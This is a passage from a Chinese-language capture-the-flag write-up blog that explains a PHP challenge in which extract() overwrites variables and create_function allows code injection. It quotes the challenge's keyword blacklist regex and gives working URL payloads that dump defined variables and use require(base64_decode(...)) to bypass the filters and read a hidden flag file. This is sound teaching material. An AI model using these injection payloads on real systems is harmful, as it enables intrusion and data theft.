    <span class="token function">extract</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">"flag"</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">echo</span> <span class="token string">"Very good! you know my password. But what is flag?&lt;br>"</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span></code></pre>
<pre class=" language-php"><code class="language-php"><span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">preg_match</span><span class="token punctuation">(</span><span class="token string">'/^[a-z0-9]*$/isD'</span><span class="token punctuation">,</span> <span class="token variable">$code</span><span class="token punctuation">)</span> <span class="token operator">||</span> 
<span class="token function">preg_match</span><span class="token punctuation">(</span><span class="token string">'/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&amp;|\$|\*|\||\&lt;|\"|\'|\=|\|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log/i'</span><span class="token punctuation">,</span> <span class="token variable">$arg</span><span class="token punctuation">)</span>  <span class="token punctuation">)</span> <span class="token punctuation">{</span> 
    <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string">'fxck you! Read my Regular Express1on!'</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
<span class="token punctuation">}</span> <span class="token keyword">else</span> <span class="token punctuation">{</span> 
    <span class="token keyword">include</span> <span class="token string">"flag.php"</span><span class="token punctuation">;</span>
    <span class="token variable">$code</span><span class="token punctuation">(</span><span class="token string">''</span><span class="token punctuation">,</span> <span class="token variable">$arg</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
<span class="token punctuation">}</span> <span class="token delimiter">?></span></code></pre>
<p>这里其实ban了的关键字大多数都是根据无参数RCE能用到的函数来ban的。</p>
<p><code>$arg</code>和<code>$code</code>变量都是可控的，因为<code>extract()</code>函数使用数组键名作为变量名，使用数组键值作为变量值，针对数组中的每个元素，将在当前符号表中创建对应的一个变量。因此只要<code>extract()</code>内的数组键名为<code>arg</code>和<code>code</code>，键值为我们构造的用来注入的代码，即可实现<code>$arg</code>和<code>$code</code>的变量覆盖，导致代码注入。payload:</p>
<pre><code>&amp;flag[arg]=}a();//&amp;flag[code]=create_function</code></pre><p>这样就会执行<code>a();</code> ，这个<code>a()</code>只是个暂时性演示，接下来再考虑到底执行什么php命令来得到flag</p>
<p>现在的困难：</p>
<ul>
<li>不能通过<code>system()</code>等函数执行系统命令，就无法<code>cat flag.php</code></li>
<li>过滤了flag等关键字，不能操作<code>$flag</code>变量</li>
<li>过滤了print等关键字，不能直接读取或类似无参数RCE的方法flag.php源代码</li>
</ul>
<p>包含了这个文件，代表可以使用里面的变量。所以要想办法在不指定变量名称的情况下输出变量的值，可以想到：<strong>是否存在一个函数，能输出所有变量的值？</strong></p>
<p>有的！<code>get_defined_vars()</code>用来输出所有变量和值！Payload：</p>
<pre><code>1nD3x.php?%7a%75%69%73%68%75%61%69=%79%31%6e%67%7a%75%69%73%68%75%61%69%0a&amp;%79%31%6e%67[]=111&amp;%70%6173%73%77%64[]=222&amp;%70%61%73%73%77%64[]=222&amp;%66%6c%61%67[arg]=}var_dump(get_defined_vars());//&amp;%66%6c%61%67[code]=create_function&amp;file=data://text/plain,%79%31%6e%67%5f%59%75%5a%68%6f%75%5f%57%75%64%69%5f%7a%75%69%73%68%75%61%69
POST: zuishuai=1&amp;file=1

解码后：1nD3x.php?zuishuai=y1ngzuishuai&amp;y1ng[]=111&amp;passwd[]=222&amp;passwd[]=222&amp;flag[arg]=}var_dump(get_defined_vars());//&amp;flag[code]=create_function&amp;file=data://text/plain,y1ng_YuZhou_Wudi_zuishuai</code></pre><p>这里的flag.php是假flag，真的在1flag.php里</p>
<h5 id="考点8，得到真正的flag-不适用于BJDCTF"><a href="#考点8，得到真正的flag-不适用于BJDCTF" class="headerlink" title="考点8，得到真正的flag (不适用于BJDCTF)"></a><strong>考点8，得到真正的flag (不适用于BJDCTF)</strong></h5><p>我们可以继续通过刚刚的方法，就是<code>get_defined_vars()</code>，得到1flag.php的变量的值，但是前提是需要包含1flag.php。</p>
<p>现在的困难：</p>
<ul>
<li>过滤了include关键字</li>
<li>过滤了单引号双引号</li>
<li>过滤了flag关键字和类似无参数RCE题目中能够得到1flag.php字符串的各种函数的关键字，比如无法<code>scandir()</code></li>
</ul>
<p>应对的策略：</p>
<ul>
<li>过滤了include 还能用require</li>
<li>过滤了引号，可以使用那些参数可以不加引号的函数，<code>require()</code>代替<code>require &quot; &quot;</code></li>
<li>过滤了flag，可以base64编码。其他过滤的不用便是</li>
</ul>
<p>Payload：</p>
<pre><code>/1nD3x.php?%7a%75%69%73%68%75%61%69=%79%31%6e%67%7a%75%69%73%68%75%61%69%0a&amp;%79%31%6e%67[]=111&amp;%70%6173%73%77%64[]=222&amp;%70%61%73%73%77%64[]=222&amp;%66%6c%61%67[arg]=}require(base64_decode(MWZsYWcucGhw));var_dump(get_defined_vars());//&amp;%66%6c%61%67[code]=create_function&amp;file=data://text/plain,%79%31%6e%67%5f%59%75%5a%68%6f%75%5f%57%75%64%69%5f%7a%75%69%73%68%75%61%69
POST: zuishuai=1&amp;file=1

解码后:/1nD3x.php?zuishuai=y1ngzuishuai&amp;y1ng[]=111&amp;passwd[]=222&amp;passwd[]=222&amp;flag[arg]=}require(base64_decod(MWZsYWcucGhw));var_dump(get_defined_vars());//&amp;flag[code]=create_function&amp;file=data://text/plain,y1ng_YuZhou_Wudi_zuishuai</code></pre><pre><code>核心部分：require(base64_decode(MWZsYWcucGhw));</code></pre><p>MWZsYWcucGhw解码后为1flag.php。另外<code>base64_decode(&quot;MWZsYWcucGhw&quot;)</code>把引号去掉也是可以的，所以能够bypass引号过滤。</p>
<p>真的学到很多。</p>

            </div>

            <!-- Post Comments -->
            
    <!-- 使用 DISQUS_CLICK -->
<div id="disqus-comment">
    <div id="disqus_thread"></div>

<!-- add animation -->
<style>
	.disqus_click_btn {
            line-height: 30px;
            margin: 0;
            min-width: 50px;
            padding: 0 14px;
            display: inline-block;
            font-family: "Roboto", "Helvetica", "Arial", sans-serif;
            font-size: 14px;
            font-weight: 400;
            text-transform: uppercase;
            letter-spacing: 0;
            overflow: hidden;
            will-change: box-shadow;
            transition: box-shadow .2s cubic-bezier(.4, 0, 1, 1), background-color .2s cubic-bezier(.4, 0, .2, 1), color .2s cubic-bezier(.4, 0, .2, 1);
            outline: 0;
            cursor: pointer;
            text-decoration: none;
            text-align: center;
            vertical-align: middle;
            border: 0;
            background: rgba(158, 158, 158, .2);
            box-shadow: 0 2px 2px 0 rgba(0, 0, 0, .14), 0 3px 1px -2px rgba(0, 0, 0, .2), 0 1px 5px 0 rgba(0, 0, 0, .12);
            color: #fff;
            background-color: #7EC0EE;
            text-shadow: 0
        }
</style>
	
<div class="btn_click_load" id="disqus_bt"> 
    <button class="disqus_click_btn">点击查看评论</button>
</div>

<!--
<script type="text/javascript">
$('.btn_click_load').click(function() {
    /* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */
    var disqus_shortname = 'http-miccall-tech'; // required: replace example with your forum shortname

    /* * * DON'T EDIT BELOW THIS LINE * * */
    (function() {
      var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
      dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
      (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
    })();

    document.getElementById('disqus_bt').style.display = "none";
});
</script>
-->
<script type="text/javascript">
    var disqus_config = function () {
        this.page.url = 'https://cuony.github.io/2020/07/24/%E7%9F%A5%E8%AF%86%E7%82%B9%E5%AD%A6%E4%B9%A0/';  // Replace PAGE_URL with your page's canonical URL variable
        this.page.identifier = 'https://cuony.github.io/2020/07/24/%E7%9F%A5%E8%AF%86%E7%82%B9%E5%AD%A6%E4%B9%A0/'; // Replace PAGE_IDENTIFIER with your page's unique identifier variable
    };
</script>

<script type="text/javascript">
    $('.btn_click_load').click(function() {  //click to load comments
        (function() { // DON'T EDIT BELOW THIS LINE
            var d = document;
            var s = d.createElement('script');
            s.src = '//http-miccall-tech.disqus.com/embed.js';
            s.setAttribute('data-timestamp', + new Date());
            (d.head || d.body).appendChild(s);
        })();
        $('.btn_click_load').css('display','none');
    });
</script>
</div>
<style>
    #disqus-comment{
        background-color: #eee;
        padding: 2pc;
    }
</style>


        </div>
        <!-- Copyright 版权 start -->
                <div id="copyright">
            <ul>
                <li>&copy;Powered By <a href="https://hexo.io/zh-cn/" target="_blank" rel="noopener" style="border-bottom: none;">hexo</a></li>
                <li>Design: <a href="http://miccall.tech " target="_blank" rel="noopener" style="border-bottom: none;">miccall</a></li>
            </ul>
            
                <span id="busuanzi_container_site_pv">本站总访问量<span id="busuanzi_value_site_pv"></span>次</span>
			
        </div>
    </div>
</body>



 	
</html>
